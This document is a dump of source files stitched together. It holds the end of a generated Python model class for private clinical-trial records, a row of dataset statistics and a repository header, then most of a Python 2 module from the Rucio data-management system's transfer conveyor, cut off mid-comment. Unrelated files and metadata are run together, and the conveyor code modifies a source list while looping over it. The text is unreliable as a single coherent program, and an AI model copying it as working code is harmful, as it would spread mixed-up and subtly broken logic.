return self._overall_contact
@overall_contact.setter
def overall_contact(self, overall_contact):
"""Sets the overall_contact of this PrivateTrial.
:param overall_contact: The overall_contact of this PrivateTrial. # noqa: E501
:type: Contact
"""
self._overall_contact = overall_contact
@property
def overall_contact_backup(self):
"""Gets the overall_contact_backup of this PrivateTrial. # noqa: E501
:return: The overall_contact_backup of this PrivateTrial. # noqa: E501
:rtype: Contact
"""
return self._overall_contact_backup
@overall_contact_backup.setter
def overall_contact_backup(self, overall_contact_backup):
"""Sets the overall_contact_backup of this PrivateTrial.
:param overall_contact_backup: The overall_contact_backup of this PrivateTrial. # noqa: E501
:type: Contact
"""
self._overall_contact_backup = overall_contact_backup
@property
def location(self):
"""Gets the location of this PrivateTrial. # noqa: E501
Information about the locations offering this trial. # noqa: E501
:return: The location of this PrivateTrial. # noqa: E501
:rtype: list[Location]
"""
return self._location
@location.setter
def location(self, location):
"""Sets the location of this PrivateTrial.
Information about the locations offering this trial. # noqa: E501
:param location: The location of this PrivateTrial. # noqa: E501
:type: list[Location]
"""
if location is None:
raise ValueError("Invalid value for `location`, must not be `None`") # noqa: E501
self._location = location
@property
def location_countries(self):
"""Gets the location_countries of this PrivateTrial. # noqa: E501
Countries with locations offering this trial. # noqa: E501
:return: The location_countries of this PrivateTrial. # noqa: E501
:rtype: list[str]
"""
return self._location_countries
@location_countries.setter
def location_countries(self, location_countries):
"""Sets the location_countries of this PrivateTrial.
Countries with locations offering this trial. # noqa: E501
:param location_countries: The location_countries of this PrivateTrial. # noqa: E501
:type: list[str]
"""
self._location_countries = location_countries
@property
def link(self):
"""Gets the link of this PrivateTrial. # noqa: E501
URL to institution (if private) or registry listing of this trial. # noqa: E501
:return: The link of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._link
@link.setter
def link(self, link):
"""Sets the link of this PrivateTrial.
URL to institution (if private) or registry listing of this trial. # noqa: E501
:param link: The link of this PrivateTrial. # noqa: E501
:type: str
"""
self._link = link
@property
def reference(self):
"""Gets the reference of this PrivateTrial. # noqa: E501
Reference publications pertaining to this trial. # noqa: E501
:return: The reference of this PrivateTrial. # noqa: E501
:rtype: list[Reference]
"""
return self._reference
@reference.setter
def reference(self, reference):
"""Sets the reference of this PrivateTrial.
Reference publications pertaining to this trial. # noqa: E501
:param reference: The reference of this PrivateTrial. # noqa: E501
:type: list[Reference]
"""
self._reference = reference
@property
def verification_date(self):
"""Gets the verification_date of this PrivateTrial. # noqa: E501
The date on which the responsible party last verified the clinical study information in the entire ClinicalTrials.gov record for the clinical study, even if no additional or updated information is being submitted. # noqa: E501
:return: The verification_date of this PrivateTrial. # noqa: E501
:rtype: datetime
"""
return self._verification_date
@verification_date.setter
def verification_date(self, verification_date):
"""Sets the verification_date of this PrivateTrial.
The date on which the responsible party last verified the clinical study information in the entire ClinicalTrials.gov record for the clinical study, even if no additional or updated information is being submitted. # noqa: E501
:param verification_date: The verification_date of this PrivateTrial. # noqa: E501
:type: datetime
"""
self._verification_date = verification_date
@property
def study_first_submitted(self):
"""Gets the study_first_submitted of this PrivateTrial. # noqa: E501
The date on which the study sponsor or investigator first submitted a study record to the trial registry. # noqa: E501
:return: The study_first_submitted of this PrivateTrial. # noqa: E501
:rtype: datetime
"""
return self._study_first_submitted
@study_first_submitted.setter
def study_first_submitted(self, study_first_submitted):
"""Sets the study_first_submitted of this PrivateTrial.
The date on which the study sponsor or investigator first submitted a study record to the trial registry. # noqa: E501
:param study_first_submitted: The study_first_submitted of this PrivateTrial. # noqa: E501
:type: datetime
"""
self._study_first_submitted = study_first_submitted
@property
def study_first_posted(self):
"""Gets the study_first_posted of this PrivateTrial. # noqa: E501
The date on which the study was first made public on trial registry. # noqa: E501
:return: The study_first_posted of this PrivateTrial. # noqa: E501
:rtype: datetime
"""
return self._study_first_posted
@study_first_posted.setter
def study_first_posted(self, study_first_posted):
"""Sets the study_first_posted of this PrivateTrial.
The date on which the study was first made public on trial registry. # noqa: E501
:param study_first_posted: The study_first_posted of this PrivateTrial. # noqa: E501
:type: datetime
"""
self._study_first_posted = study_first_posted
@property
def last_update_posted(self):
"""Gets the last_update_posted of this PrivateTrial. # noqa: E501
The most recent date that any information was updated for this trial. # noqa: E501
:return: The last_update_posted of this PrivateTrial. # noqa: E501
:rtype: datetime
"""
return self._last_update_posted
@last_update_posted.setter
def last_update_posted(self, last_update_posted):
"""Sets the last_update_posted of this PrivateTrial.
The most recent date that any information was updated for this trial. # noqa: E501
:param last_update_posted: The last_update_posted of this PrivateTrial. # noqa: E501
:type: datetime
"""
self._last_update_posted = last_update_posted
@property
def keyword(self):
"""Gets the keyword of this PrivateTrial. # noqa: E501
Words or phrases that best describe the protocol. Keywords help users find studies in the database. Use NLM's Medical Subject Heading (MeSH)-controlled vocabulary terms where appropriate. Be as specific and precise as possible. # noqa: E501
:return: The keyword of this PrivateTrial. # noqa: E501
:rtype: list[str]
"""
return self._keyword
@keyword.setter
def keyword(self, keyword):
"""Sets the keyword of this PrivateTrial.
Words or phrases that best describe the protocol. Keywords help users find studies in the database. Use NLM's Medical Subject Heading (MeSH)-controlled vocabulary terms where appropriate. Be as specific and precise as possible. # noqa: E501
:param keyword: The keyword of this PrivateTrial. # noqa: E501
:type: list[str]
"""
self._keyword = keyword
@property
def responsible_party(self):
"""Gets the responsible_party of this PrivateTrial. # noqa: E501
The entities and individuals responsible for this trial. # noqa: E501
:return: The responsible_party of this PrivateTrial. # noqa: E501
:rtype: list[ResponsibleParty]
"""
return self._responsible_party
@responsible_party.setter
def responsible_party(self, responsible_party):
"""Sets the responsible_party of this PrivateTrial.
The entities and individuals responsible for this trial. # noqa: E501
:param responsible_party: The responsible_party of this PrivateTrial. # noqa: E501
:type: list[ResponsibleParty]
"""
self._responsible_party = responsible_party
@property
def processing_status(self):
"""Gets the processing_status of this PrivateTrial. # noqa: E501
Indication of its level of readiness and incorporation into the MolecularMatch Knowledge base. # noqa: E501
:return: The processing_status of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._processing_status
@processing_status.setter
def processing_status(self, processing_status):
"""Sets the processing_status of this PrivateTrial.
Indication of its level of readiness and incorporation into the MolecularMatch Knowledge base. # noqa: E501
:param processing_status: The processing_status of this PrivateTrial. # noqa: E501
:type: str
"""
allowed_values = ["received", "in-process", "registered"] # noqa: E501
if processing_status not in allowed_values:
raise ValueError(
"Invalid value for `processing_status` ({0}), must be one of {1}" # noqa: E501
.format(processing_status, allowed_values)
)
self._processing_status = processing_status
@property
def test(self):
"""Gets the test of this PrivateTrial. # noqa: E501
A flag to mark test private trials. # noqa: E501
:return: The test of this PrivateTrial. # noqa: E501
:rtype: bool
"""
return self._test
@test.setter
def test(self, test):
"""Sets the test of this PrivateTrial.
A flag to mark test private trials. # noqa: E501
:param test: The test of this PrivateTrial. # noqa: E501
:type: bool
"""
self._test = test
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(PrivateTrial, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PrivateTrial):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
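# Usage sketch (illustration only, never called): `to_dict` recursively
# serialises nested models and lists of models, so the result mirrors the
# keys of `swagger_types` with plain values; `to_str` pretty-prints that
# same dict and backs `__repr__`. `trial` is assumed to be an already
# populated PrivateTrial instance.
def _example_to_dict_roundtrip(trial):
    as_dict = trial.to_dict()  # nested models expanded via their own to_dict
    as_text = trial.to_str()   # pprint.pformat of the same dict
    return as_dict, as_text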
| 35.920525 | 993 | 0.649595 | 6,187 | 51,977 | 5.290124 | 0.065621 | 0.058662 | 0.105591 | 0.096792 | 0.679377 | 0.572563 | 0.532478 | 0.444913 | 0.355545 | 0.277146 | 0 | 0.021011 | 0.273871 | 51,977 | 1,446 | 994 | 35.945367 | 0.846193 | 0.45751 | 0 | 0.090461 | 1 | 0 | 0.136703 | 0.008254 | 0 | 0 | 0 | 0 | 0 | 1 | 0.167763 | false | 0 | 0.004934 | 0 | 0.266447 | 0.003289 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
382f2f78668adbeb3d9c2f747861ad2dbe227500 | 78,600 | py | Python | lib/rucio/daemons/conveyor/utils.py | brianv0/rucio | 127a36fd53e5b4d9eb14ab02fe6c36443d78bfd0 | [
"Apache-2.0"
] | null | null | null | lib/rucio/daemons/conveyor/utils.py | brianv0/rucio | 127a36fd53e5b4d9eb14ab02fe6c36443d78bfd0 | [
"Apache-2.0"
] | null | null | null | lib/rucio/daemons/conveyor/utils.py | brianv0/rucio | 127a36fd53e5b4d9eb14ab02fe6c36443d78bfd0 | [
"Apache-2.0"
] | null | null | null | # Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Vincent Garonne, <vincent.garonne@cern.ch>, 2012-2014
# - Mario Lassnig, <mario.lassnig@cern.ch>, 2013-2015
# - Cedric Serfon, <cedric.serfon@cern.ch>, 2013-2016
# - Wen Guan, <wen.guan@cern.ch>, 2014-2016
# - Joaquin Bogado, <jbogadog@cern.ch>, 2016
"""
Methods common to different conveyor submitter daemons.
"""
import math
import datetime
import json
import logging
import random
import time
import traceback
from dogpile.cache import make_region
from dogpile.cache.api import NoValue
from rucio.common.closeness_sorter import sort_sources
from rucio.common.exception import DataIdentifierNotFound, RSEProtocolNotSupported, InvalidRSEExpression, InvalidRequest
from rucio.common.rse_attributes import get_rse_attributes
from rucio.common.utils import construct_surl, chunks
from rucio.core import did, replica, request, rse as rse_core
from rucio.core.monitor import record_counter, record_timer, record_gauge
from rucio.core.rse_expression_parser import parse_expression
from rucio.db.sqla.constants import DIDType, RequestType, RequestState, RSEType
from rucio.db.sqla.session import read_session
from rucio.rse import rsemanager as rsemgr
REGION_SHORT = make_region().configure('dogpile.cache.memcached',
expiration_time=600,
arguments={'url': "127.0.0.1:11211", 'distributed_lock': True})
def get_rses(rses=None, include_rses=None, exclude_rses=None):
working_rses = []
rses_list = rse_core.list_rses()
if rses:
working_rses = [rse for rse in rses_list if rse['rse'] in rses]
if include_rses:
try:
parsed_rses = parse_expression(include_rses, session=None)
except InvalidRSEExpression, e:
logging.error("Invalid RSE exception %s to include RSEs" % (include_rses))
else:
for rse in parsed_rses:
if rse not in working_rses:
working_rses.append(rse)
if not (rses or include_rses):
working_rses = rses_list
if exclude_rses:
try:
parsed_rses = parse_expression(exclude_rses, session=None)
except InvalidRSEExpression, e:
logging.error("Invalid RSE exception %s to exclude RSEs: %s" % (exclude_rses, e))
else:
working_rses = [rse for rse in working_rses if rse not in parsed_rses]
working_rses = [rsemgr.get_rse_info(rse['rse']) for rse in working_rses]
return working_rses
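# Usage sketch (hypothetical RSE names and expression, never called by the
# daemons): `get_rses` starts from the explicit `rses` names, unions in the
# parsed `include_rses` expression, falls back to all RSEs when neither is
# given, and finally subtracts the parsed `exclude_rses` expression.
def _example_get_rses():
    return get_rses(rses=['MOCK_DISK'], include_rses='tier=1', exclude_rses='MOCK_TAPE')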
def get_requests(rse_id=None,
process=0, total_processes=1, thread=0, total_threads=1,
mock=False, bulk=100, activity=None, activity_shares=None):
ts = time.time()
reqs = request.get_next(request_type=[RequestType.TRANSFER,
RequestType.STAGEIN,
RequestType.STAGEOUT],
state=RequestState.QUEUED,
limit=bulk,
rse=rse_id,
activity=activity,
process=process,
total_processes=total_processes,
thread=thread,
total_threads=total_threads,
activity_shares=activity_shares)
record_timer('daemons.conveyor.submitter.get_next', (time.time() - ts) * 1000)
return reqs
def get_sources(dest_rse, schemes, req, max_sources=4):
allowed_rses = []
if req['request_type'] == RequestType.STAGEIN:
rses = rse_core.list_rses(filters={'staging_buffer': dest_rse['rse']})
allowed_rses = [x['rse'] for x in rses]
allowed_source_rses = []
if req['attributes']:
if type(req['attributes']) is dict:
req_attributes = json.loads(json.dumps(req['attributes']))
else:
req_attributes = json.loads(str(req['attributes']))
        source_replica_expression = req_attributes.get("source_replica_expression")
if source_replica_expression:
try:
parsed_rses = parse_expression(source_replica_expression, session=None)
except InvalidRSEExpression, e:
logging.error("Invalid RSE exception %s for request %s: %s" % (source_replica_expression,
req['request_id'],
e))
allowed_source_rses = []
else:
allowed_source_rses = [x['rse'] for x in parsed_rses]
tmpsrc = []
metadata = {}
try:
ts = time.time()
replications = replica.list_replicas(dids=[{'scope': req['scope'],
'name': req['name'],
'type': DIDType.FILE}],
schemes=schemes)
record_timer('daemons.conveyor.submitter.list_replicas', (time.time() - ts) * 1000)
# return gracefully if there are no replicas for a DID
if not replications:
return None, None
for source in replications:
try:
metadata['filesize'] = long(source['bytes'])
except KeyError, e:
logging.error('source for %s:%s has no filesize set - skipping' % (source['scope'], source['name']))
continue
metadata['md5'] = source['md5']
metadata['adler32'] = source['adler32']
# TODO: Source protection
# we need to know upfront if we are mixed DISK/TAPE source
mixed_source = []
for source_rse in source['rses']:
mixed_source.append(rse_core.get_rse(source_rse).rse_type)
            mixed_source = len(set(mixed_source)) > 1
for source_rse in source['rses']:
if req['request_type'] == RequestType.STAGEIN:
if source_rse in allowed_rses:
for pfn in source['rses'][source_rse]:
# In case of staging request, we only use one source
tmpsrc = [(str(source_rse), str(pfn)), ]
elif req['request_type'] == RequestType.TRANSFER:
if source_rse == dest_rse['rse']:
logging.debug('Skip source %s for request %s because it is the destination' % (source_rse,
req['request_id']))
continue
if allowed_source_rses and not (source_rse in allowed_source_rses):
logging.debug('Skip source %s for request %s because of source_replica_expression %s' % (source_rse,
req['request_id'],
req['attributes']))
continue
# do not allow mixed source jobs, either all DISK or all TAPE
# do not use TAPE on the first try
if mixed_source:
if not req['previous_attempt_id'] and rse_core.get_rse(source_rse).rse_type == RSEType.TAPE and source_rse not in allowed_source_rses:
logging.debug('Skip tape source %s for request %s' % (source_rse,
req['request_id']))
continue
elif req['previous_attempt_id'] and rse_core.get_rse(source_rse).rse_type == RSEType.DISK and source_rse not in allowed_source_rses:
logging.debug('Skip disk source %s for retrial request %s' % (source_rse,
req['request_id']))
continue
filtered_sources = [x for x in source['rses'][source_rse] if x.startswith('gsiftp')]
if not filtered_sources:
filtered_sources = source['rses'][source_rse]
for pfn in filtered_sources:
tmpsrc.append((str(source_rse), str(pfn)))
except DataIdentifierNotFound:
record_counter('daemons.conveyor.submitter.lost_did')
logging.warn('DID %s:%s does not exist anymore - marking request %s as LOST' % (req['scope'],
req['name'],
req['request_id']))
return None, None
except:
record_counter('daemons.conveyor.submitter.unexpected')
logging.critical('Something unexpected happened: %s' % traceback.format_exc())
return None, None
sources = []
    if not tmpsrc:
record_counter('daemons.conveyor.submitter.nosource')
logging.warn('No source replicas found for DID %s:%s - deep check for unavailable replicas' % (req['scope'],
req['name']))
if sum(1 for tmp in replica.list_replicas([{'scope': req['scope'],
'name': req['name'],
'type': DIDType.FILE}],
schemes=schemes,
unavailable=True)):
logging.error('DID %s:%s lost! This should not happen!' % (req['scope'], req['name']))
return None, None
else:
used_sources = request.get_sources(req['request_id'])
for tmp in tmpsrc:
source_rse_info = rsemgr.get_rse_info(tmp[0])
rank = None
if used_sources:
for used_source in used_sources:
if used_source['rse_id'] == source_rse_info['id']:
# file already used
rank = used_source['ranking']
break
sources.append((tmp[0], tmp[1], source_rse_info['id'], rank))
if len(sources) > 1:
sources = sort_sources(sources, dest_rse['rse'])
if len(sources) > max_sources:
sources = sources[:max_sources]
random.shuffle(sources)
return sources, metadata
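# Shape sketch (invented values): each element of the returned `sources`
# list is a 4-tuple (rse_name, pfn, rse_id, ranking); ranking stays None
# for replicas that were never tried for this request.
_EXAMPLE_SOURCE_TUPLE = ('MOCK_DISK', 'gsiftp://mock.example.org/path/file', 1, None)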
def get_destinations(rse_info, scheme, req, naming_convention):
dsn = 'other'
pfn = {}
if not rse_info['deterministic']:
ts = time.time()
# get rule scope and name
if req['attributes']:
if type(req['attributes']) is dict:
req_attributes = json.loads(json.dumps(req['attributes']))
else:
req_attributes = json.loads(str(req['attributes']))
if 'ds_name' in req_attributes:
dsn = req_attributes["ds_name"]
if dsn == 'other':
# select a containing dataset
for parent in did.list_parent_dids(req['scope'], req['name']):
if parent['type'] == DIDType.DATASET:
dsn = parent['name']
break
record_timer('daemons.conveyor.submitter.list_parent_dids', (time.time() - ts) * 1000)
# DQ2 path always starts with /, but prefix might not end with /
path = construct_surl(dsn, req['name'], naming_convention)
# retrial transfers to tape need a new filename - add timestamp
if req['request_type'] == RequestType.TRANSFER and rse_info['rse_type'] == 'TAPE':
if 'previous_attempt_id' in req and req['previous_attempt_id']:
path = '%s_%i' % (path, int(time.time()))
logging.debug('Retrial transfer request %s DID %s:%s to tape %s renamed to %s' % (req['request_id'],
req['scope'],
req['name'],
rse_info['rse'],
path))
elif req['activity'] and req['activity'] == 'Recovery':
path = '%s_%i' % (path, int(time.time()))
logging.debug('Recovery transfer request %s DID %s:%s to tape %s renamed to %s' % (req['request_id'],
req['scope'],
req['name'],
rse_info['rse'],
path))
# we must set the destination path for nondeterministic replicas explicitly
replica.update_replicas_paths([{'scope': req['scope'],
'name': req['name'],
'rse_id': req['dest_rse_id'],
'path': path}])
lfn = [{'scope': req['scope'], 'name': req['name'], 'path': path}]
else:
lfn = [{'scope': req['scope'], 'name': req['name']}]
ts = time.time()
try:
pfn = rsemgr.lfns2pfns(rse_info, lfns=lfn, operation='write', scheme=scheme)
except RSEProtocolNotSupported:
logging.error('Operation "write" not supported by %s' % (rse_info['rse']))
return None, None
record_timer('daemons.conveyor.submitter.lfns2pfns', (time.time() - ts) * 1000)
destinations = []
for k in pfn:
if isinstance(pfn[k], (str, unicode)):
destinations.append(pfn[k])
elif isinstance(pfn[k], (tuple, list)):
for url in pfn[k]:
destinations.append(pfn[k][url])
protocol = None
try:
protocol = rsemgr.select_protocol(rse_info, 'write', scheme=scheme)
except RSEProtocolNotSupported:
logging.error('Operation "write" not supported by %s' % (rse_info['rse']))
return None, None
# we need to set the spacetoken if we use SRM
dest_spacetoken = None
if protocol['extended_attributes'] and 'space_token' in protocol['extended_attributes']:
dest_spacetoken = protocol['extended_attributes']['space_token']
return destinations, dest_spacetoken
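# Path sketch (invented dataset and file names): nondeterministic
# destinations are derived from the parent dataset name via
# `construct_surl`, and retries to TAPE append a timestamp so the new name
# cannot clash with the earlier attempt; passing None falls back to the
# default naming convention, as in the code above.
def _example_tape_retry_path():
    path = construct_surl('mock.dataset', 'mock.file', None)
    return '%s_%i' % (path, int(time.time()))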
def get_transfer(rse, req, scheme, mock, max_sources=4):
src_spacetoken = None
if req['request_type'] == RequestType.STAGEIN:
# for staging in, get the sources at first, then use the sources as destination
if not (rse['staging_area'] or rse['rse'].endswith("STAGING")):
raise InvalidRequest('Not a STAGING RSE for STAGE-IN request')
ts = time.time()
if scheme is None:
sources, metadata = get_sources(rse, None, req, max_sources=max_sources)
else:
if not isinstance(scheme, list):
scheme = scheme.split(',')
sources, metadata = get_sources(rse, scheme, req, max_sources=max_sources)
record_timer('daemons.conveyor.submitter.get_sources', (time.time() - ts) * 1000)
logging.debug('Sources for request %s: %s' % (req['request_id'], sources))
if sources is None:
logging.error("Request %s DID %s:%s RSE %s failed to get sources" % (req['request_id'],
req['scope'],
req['name'],
rse['rse']))
return None
filesize = metadata['filesize']
md5 = metadata['md5']
adler32 = metadata['adler32']
# Sources are properly set, so now we can finally force the source RSE to the destination RSE for STAGEIN
dest_rse = sources[0][0]
rse_attr = rse_core.list_rse_attributes(sources[0][0])
fts_hosts = rse_attr.get('fts', None)
naming_convention = rse_attr.get('naming_convention', None)
if len(sources) == 1:
destinations = [sources[0][1]]
else:
# TODO: need to check
return None
protocol = None
try:
            # for stage-in, dest_spacetoken should be the source space token
source_rse_info = rsemgr.get_rse_info(sources[0][0])
protocol = rsemgr.select_protocol(source_rse_info, 'write')
except RSEProtocolNotSupported:
logging.error('Operation "write" not supported by %s' % (source_rse_info['rse']))
return None
# we need to set the spacetoken if we use SRM
dest_spacetoken = None
if 'space_token' in protocol['extended_attributes']:
dest_spacetoken = protocol['extended_attributes']['space_token']
# Extend the metadata dictionary with request attributes
copy_pin_lifetime, overwrite, bring_online = -1, True, None
if req['attributes']:
if type(req['attributes']) is dict:
attr = json.loads(json.dumps(req['attributes']))
else:
attr = json.loads(str(req['attributes']))
copy_pin_lifetime = attr.get('lifetime')
overwrite = False
bring_online = 172800
else:
# for normal transfer, get the destination at first, then use the destination scheme to get sources
rse_attr = rse_core.list_rse_attributes(rse['rse'], rse['id'])
fts_hosts = rse_attr.get('fts', None)
naming_convention = rse_attr.get('naming_convention', None)
ts = time.time()
destinations, dest_spacetoken = get_destinations(rse, scheme, req, naming_convention)
record_timer('daemons.conveyor.submitter.get_destinations', (time.time() - ts) * 1000)
logging.debug('Destinations for request %s: %s' % (req['request_id'], destinations))
if destinations is None:
logging.error("Request %s DID %s:%s RSE %s failed to get destinations" % (req['request_id'],
req['scope'],
req['name'],
rse['rse']))
return None
schemes = []
for destination in destinations:
schemes.append(destination.split("://")[0])
if 'srm' in schemes and 'gsiftp' not in schemes:
schemes.append('gsiftp')
if 'gsiftp' in schemes and 'srm' not in schemes:
schemes.append('srm')
logging.debug('Schemes will be allowed for sources: %s' % (schemes))
ts = time.time()
sources, metadata = get_sources(rse, schemes, req, max_sources=max_sources)
record_timer('daemons.conveyor.submitter.get_sources', (time.time() - ts) * 1000)
logging.debug('Sources for request %s: %s' % (req['request_id'], sources))
if not sources:
logging.error("Request %s DID %s:%s RSE %s failed to get sources" % (req['request_id'],
req['scope'],
req['name'],
rse['rse']))
return None
dest_rse = rse['rse']
# exclude destination replica from source
new_sources = sources
for source in sources:
if source[0] == dest_rse:
logging.info('Excluding source %s for request %s: source is destination' % (source[0],
req['request_id']))
new_sources.remove(source)
sources = new_sources
filesize = metadata['filesize']
md5 = metadata['md5']
adler32 = metadata['adler32']
# Extend the metadata dictionary with request attributes
copy_pin_lifetime, overwrite, bring_online = -1, True, None
if rse_core.get_rse(sources[0][0]).rse_type == RSEType.TAPE:
bring_online = 172800
if rse_core.get_rse(None, rse_id=req['dest_rse_id']).rse_type == RSEType.TAPE:
overwrite = False
# make sure we only use one source when bring_online is needed
if bring_online and len(sources) > 1:
sources = [sources[0]]
logging.info('Only using first source %s for bring_online request %s' % (sources,
req['request_id']))
# Come up with mock sources if necessary
if mock:
tmp_sources = []
for s in sources:
tmp_sources.append((s[0], ':'.join(['mock'] + s[1].split(':')[1:]), s[2], s[3]))
sources = tmp_sources
source_surls = [s[1] for s in sources]
if not source_surls:
logging.error('All sources excluded - SKIP REQUEST %s' % req['request_id'])
return
tmp_metadata = {'request_id': req['request_id'],
'scope': req['scope'],
'name': req['name'],
'activity': req['activity'],
'src_rse': sources[0][0],
'dst_rse': dest_rse,
'dest_rse_id': req['dest_rse_id'],
'filesize': filesize,
'md5': md5,
'adler32': adler32}
if 'previous_attempt_id' in req and req['previous_attempt_id']:
tmp_metadata['previous_attempt_id'] = req['previous_attempt_id']
retry_count = req['retry_count']
if not retry_count:
retry_count = 0
if not fts_hosts:
logging.error('Destination RSE %s FTS attribute not defined - SKIP REQUEST %s' % (rse['rse'], req['request_id']))
return
fts_list = fts_hosts.split(",")
external_host = fts_list[retry_count % len(fts_list)]
transfer = {'request_id': req['request_id'],
'sources': sources,
# 'src_urls': source_surls,
'dest_urls': destinations,
'filesize': filesize,
'md5': md5,
'adler32': adler32,
'src_spacetoken': src_spacetoken,
'dest_spacetoken': dest_spacetoken,
'activity': req['activity'],
'overwrite': overwrite,
'bring_online': bring_online,
'copy_pin_lifetime': copy_pin_lifetime,
'external_host': external_host,
'file_metadata': tmp_metadata,
'rule_id': req['rule_id']}
return transfer
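# Scheme symmetry sketch (illustration only): the destination scheme
# decides which source schemes are allowed, with srm and gsiftp treated as
# interchangeable; a condensed restatement of the scheme handling above.
def _example_allowed_source_schemes(dest_scheme):
    if dest_scheme in ('srm', 'gsiftp'):
        return ['srm', 'gsiftp']
    return [dest_scheme]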
def get_transfers_from_requests(process=0, total_processes=1, thread=0, total_threads=1, rse_ids=None,
mock=False, bulk=100, activity=None, activity_shares=None, scheme=None, max_sources=4):
ts = time.time()
reqs = get_requests(process=process,
total_processes=total_processes,
thread=thread,
total_threads=total_threads,
mock=mock,
bulk=bulk,
activity=activity,
activity_shares=activity_shares)
record_timer('daemons.conveyor.submitter.get_requests', (time.time() - ts) * 1000)
if reqs:
logging.debug('%i:%i - Getting %i requests' % (process, thread, len(reqs)))
    if not reqs:
return {}
# get transfers
transfers = {}
for req in reqs:
try:
if rse_ids and req['dest_rse_id'] not in rse_ids:
# logging.info("Request dest %s is not in RSEs list, skip")
continue
else:
dest_rse = rse_core.get_rse(rse=None, rse_id=req['dest_rse_id'])
rse_info = rsemgr.get_rse_info(dest_rse['rse'])
ts = time.time()
transfer = get_transfer(rse_info, req, scheme, mock, max_sources=max_sources)
record_timer('daemons.conveyor.submitter.get_transfer', (time.time() - ts) * 1000)
logging.debug('Transfer for request %s: %s' % (req['request_id'], transfer))
if transfer is None:
logging.error("Request %s DID %s:%s RSE %s failed to get transfer" % (req['request_id'],
req['scope'],
req['name'],
rse_info['rse']))
request.set_request_state(req['request_id'], RequestState.LOST)
continue
transfers[req['request_id']] = transfer
except Exception, e:
logging.error("Failed to get transfer for request(%s): %s " % (req['request_id'], str(e)))
return transfers
def bulk_group_transfer(transfers, policy='rule', group_bulk=200, fts_source_strategy='auto', max_time_in_queue=None):
grouped_transfers = {}
grouped_jobs = {}
for request_id in transfers:
transfer = transfers[request_id]
external_host = transfer['external_host']
if external_host not in grouped_transfers:
grouped_transfers[external_host] = {}
grouped_jobs[external_host] = []
file = {'sources': transfer['sources'],
'destinations': transfer['dest_urls'],
'metadata': transfer['file_metadata'],
'filesize': int(transfer['file_metadata']['filesize']),
'checksum': None,
'selection_strategy': fts_source_strategy,
'request_type': transfer['file_metadata'].get('request_type', None),
'activity': str(transfer['file_metadata']['activity'])}
if file['metadata'].get('verify_checksum', True):
if 'md5' in file['metadata'].keys() and file['metadata']['md5']:
file['checksum'] = 'MD5:%s' % str(file['metadata']['md5'])
if 'adler32' in file['metadata'].keys() and file['metadata']['adler32']:
file['checksum'] = 'ADLER32:%s' % str(file['metadata']['adler32'])
job_params = {'verify_checksum': True if file['checksum'] and file['metadata'].get('verify_checksum', True) else False,
'spacetoken': transfer['dest_spacetoken'] if transfer['dest_spacetoken'] else 'null',
'copy_pin_lifetime': transfer['copy_pin_lifetime'] if transfer['copy_pin_lifetime'] else -1,
'bring_online': transfer['bring_online'] if transfer['bring_online'] else None,
                      'job_metadata': {'issuer': 'rucio'},  # finally job_metadata will look like this; currently it equals file_metadata so it carries request_id etc.
'source_spacetoken': transfer['src_spacetoken'] if transfer['src_spacetoken'] else None,
'overwrite': transfer['overwrite'],
'priority': 3}
if max_time_in_queue:
if transfer['file_metadata']['activity'] in max_time_in_queue:
job_params['max_time_in_queue'] = max_time_in_queue[transfer['file_metadata']['activity']]
elif 'default' in max_time_in_queue:
job_params['max_time_in_queue'] = max_time_in_queue['default']
# for multiple source replicas, no bulk submission
if len(transfer['sources']) > 1:
job_params['job_metadata']['multi_sources'] = True
grouped_jobs[external_host].append({'files': [file], 'job_params': job_params})
else:
job_params['job_metadata']['multi_sources'] = False
job_key = '%s,%s,%s,%s,%s,%s,%s,%s' % (job_params['verify_checksum'], job_params['spacetoken'], job_params['copy_pin_lifetime'],
job_params['bring_online'], job_params['job_metadata'], job_params['source_spacetoken'],
job_params['overwrite'], job_params['priority'])
if 'max_time_in_queue' in job_params:
job_key = job_key + ',%s' % job_params['max_time_in_queue']
if job_key not in grouped_transfers[external_host]:
grouped_transfers[external_host][job_key] = {}
if policy == 'rule':
policy_key = '%s' % (transfer['rule_id'])
if policy == 'dest':
policy_key = '%s' % (file['metadata']['dst_rse'])
if policy == 'src_dest':
policy_key = '%s,%s' % (file['metadata']['src_rse'], file['metadata']['dst_rse'])
if policy == 'rule_src_dest':
policy_key = '%s,%s,%s' % (transfer['rule_id'], file['metadata']['src_rse'], file['metadata']['dst_rse'])
# maybe here we need to hash the key if it's too long
if policy_key not in grouped_transfers[external_host][job_key]:
grouped_transfers[external_host][job_key][policy_key] = {'files': [file], 'job_params': job_params}
else:
grouped_transfers[external_host][job_key][policy_key]['files'].append(file)
# for jobs with different job_key, we cannot put in one job.
for external_host in grouped_transfers:
for job_key in grouped_transfers[external_host]:
# for all policy groups in job_key, the job_params is the same.
for policy_key in grouped_transfers[external_host][job_key]:
job_params = grouped_transfers[external_host][job_key][policy_key]['job_params']
for xfers_files in chunks(grouped_transfers[external_host][job_key][policy_key]['files'], group_bulk):
# for the last small piece, just submit it.
grouped_jobs[external_host].append({'files': xfers_files, 'job_params': job_params})
return grouped_jobs
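# Grouping sketch (illustration only, assuming `chunks` yields consecutive
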